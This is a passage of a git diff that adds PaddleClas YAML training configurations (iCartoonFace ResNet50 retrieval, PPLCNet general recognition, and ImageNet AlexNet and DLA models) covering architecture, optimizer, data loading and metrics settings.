b/Smart_container/PaddleClas/ppcls/configs/Cartoonface/ResNet50_icartoon.yaml @@ -0,0 +1,149 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: "./output/" + device: "gpu" + save_interval: 1 + eval_mode: "retrieval" + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + image_shape: [3, 224, 224] + infer_imgs: + save_inference_dir: "./inference" + feature_normalize: True + +Arch: + name: "RecModel" + Backbone: + name: "ResNet50" + pretrained: True + BackboneStopLayer: + name: "flatten_0" + output_dim: 2048 + Head: + name: "FC" + class_num: 5013 + embedding_size: 2048 + # margin: 0.5 + # scale: 80 + infer_output_key: "features" + infer_add_softmax: "false" + +Loss: + Train: + - CELoss: + weight: 1.0 + # - TripletLoss: + # margin: 0.1 + # weight: 0.1 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + +DataLoader: + Train: + dataset: + name: ICartoonDataset + image_root: "./dataset/iCartoonFace" + cls_label_path: "./dataset/iCartoonFace/train_list.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + #num_instances: 2 + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 6 + use_shared_memory: True + + Eval: + Query: + dataset: + name: ICartoonDataset + image_root: "./dataset/iCartoonFace" + cls_label_path: "./dataset/iCartoonFace/query.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 8 + use_shared_memory: True + + Gallery: + dataset: + name: ICartoonDataset + image_root: "./dataset/iCartoonFace" + cls_label_path: "./dataset/iCartoonFace/gallery.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 8 + use_shared_memory: True + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - Recallk: + topk: [1] diff --git a/Smart_container/PaddleClas/ppcls/configs/GeneralRecognition/GeneralRecognition_PPLCNet_x2_5.yaml b/Smart_container/PaddleClas/ppcls/configs/GeneralRecognition/GeneralRecognition_PPLCNet_x2_5.yaml new file mode 100644 index 0000000..967673f --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/GeneralRecognition/GeneralRecognition_PPLCNet_x2_5.yaml @@ -0,0 +1,148 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 100 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + eval_mode: retrieval + use_dali: False + to_static: False + +# model architecture +Arch: + name: RecModel + infer_output_key: features + infer_add_softmax: False + + Backbone: + name: PPLCNet_x2_5 + pretrained: True + use_ssld: True + BackboneStopLayer: + name: flatten_0 + Neck: + name: FC + embedding_size: 1280 + class_num: 512 + Head: + name: ArcMargin + embedding_size: 512 + class_num: 185341 + margin: 0.2 + scale: 30 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.04 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ + cls_label_path: ./dataset/train_reg_all_data.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + Query: + dataset: + name: VeriWild + image_root: ./dataset/Aliproduct/ + cls_label_path: ./dataset/Aliproduct/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + + Gallery: + dataset: + name: VeriWild + image_root: ./dataset/Aliproduct/ + cls_label_path: ./dataset/Aliproduct/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Metric: + Eval: + - Recallk: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/AlexNet/AlexNet.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/AlexNet/AlexNet.yaml new file mode 100644 index 0000000..1df2cbd --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/AlexNet/AlexNet.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: AlexNet + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + decay_epochs: [30, 60, 90] + values: [0.01, 0.001, 0.0001, 0.00001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA102.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA102.yaml new file mode 100644 index 0000000..d808afe --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA102.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DLA102 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA102x.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA102x.yaml new file mode 100644 index 0000000..10a8375 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA102x.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DLA102x + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA102x2.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA102x2.yaml new file mode 100644 index 0000000..f95279b --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA102x2.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DLA102x2 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA169.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA169.yaml new file mode 100644 index 0000000..dd1d4a2 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA169.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DLA169 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA34.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA34.yaml new file mode 100644 index 0000000..4051e36 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA34.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DLA34 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA46_c.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA46_c.yaml new file mode 100644 index 0000000..c40d763 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA46_c.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DLA46_c + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA46x_c.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA46x_c.yaml new file mode 100644 index 0000000..61a6d89 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA46x_c.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DLA46x_c + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA60.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA60.yaml new file mode 100644 index 0000000..da53f14 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA60.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DLA60 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA60x.yaml 